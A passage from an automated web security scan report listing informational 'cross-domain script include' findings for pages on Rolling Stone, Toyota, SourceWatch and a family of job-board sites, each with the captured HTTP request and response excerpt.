<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.413. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rollingstone.com
Path:	/music/albumreviews/low-country-blues-20110114

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://content.dl-rms.com/rms/mother/13402/nodetag.js
http://edge.quantserve.com/quant.js
http://icompass.insightexpressai.com/124.js
http://js.adsonar.com/js/adsonar.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /music/albumreviews/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Cache-Control: private, max-age=5507
Date: Sat, 22 Jan 2011 01:25:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...
</script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1" type="text/javascript"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js">
</script>
...[SNIP]...
</script>
<script src="http://edge.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/13402/nodetag.js"></script>


<script language="javascript" src="http://icompass.insightexpressai.com/124.js"></script>
...[SNIP]...

15.414. http://www.sciencescrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sciencescrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16dk0s9ru5o61n37p22c60grs4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:01 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 139820

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.415. http://www.scientistcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scientistcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rkh4pgjirjhh2qdflm011inei3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.416. http://www.sellingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sellingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u9aug9qog02rlvafs62g9l9651; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130266

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.417. http://www.sourcewatch.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sourcewatch.org
Path:	/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /index.php?title=Vinson_%26_Elkins_LLP HTTP/1.1
Host: www.sourcewatch.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.418. http://www.sqlcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sqlcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ic5cgni73m80fllgi2jl24kau2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109037

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.419. http://www.teenagercrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teenagercrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=240j3fr7u4qsmuqu986njli7d2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 99711

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.420. http://www.telecomcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.telecomcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fn27b7rlsvo4speggt7vmuaia6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111736

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.421. http://www.toyota.com/dealers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/dealers/

Issue detail

The response dynamically includes the following script from another domain:

http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3&mkt=en-us

Request

GET /dealers/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Date: Fri, 21 Jan 2011 18:46:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-U
...[SNIP]...
</script>
       <script charset="UTF-8" type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3&mkt=en-us"></script>
...[SNIP]...

15.422. http://www.toyota.com/ideas-for-good/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/ideas-for-good/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://w.sharethis.com/button/buttons.js

Request

GET /ideas-for-good/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Fri, 21 Jan 2011 19:53:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:29 GMT
Content-Length: 23165
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Toyota Ideas for Good</title>
       <meta http-equiv="Cont
...[SNIP]...
<meta property="og:image" content="http://www.toyota.com/ideas-for-good/img/idfFacebook.gif" />

       <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</script> -->
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script> -->
       <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

15.423. http://www.toyota.com/mobilepromo/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/mobilepromo/

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/sharethis.js

Request

GET /mobilepromo/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Fri, 21 Jan 2011 19:53:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67809

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>Toyota Mobile - Offer
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=b01bb889-2690-43e8-b632-96748b9dd9e5&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cmyspace%2Cdelicious%2Cstumbleupon%2Cdigg%2Cgoogle_bmarks%2Creddit%2Cyahoo_bmarks"></script>
...[SNIP]...

15.424. http://www.toyota.com/safety/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/safety/

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/sharethis.js

Request

GET /safety/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Date: Fri, 21 Jan 2011 19:53:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71448

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Toyota Safety - Safety Technology on all Toyota Vehicles</
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=b01bb889-2690-43e8-b632-96748b9dd9e5&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cmyspace%2Cdelicious%2Cstumbleupon%2Cdigg%2Cgoogle_bmarks%2Creddit%2Cyahoo_bmarks"></script>
...[SNIP]...

15.425. http://www.toyota.com/toyota-care/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/toyota-care/

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/sharethis.js

Request

GET /toyota-care/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Fri, 21 Jan 2011 19:53:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69486

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<title
...[SNIP]...
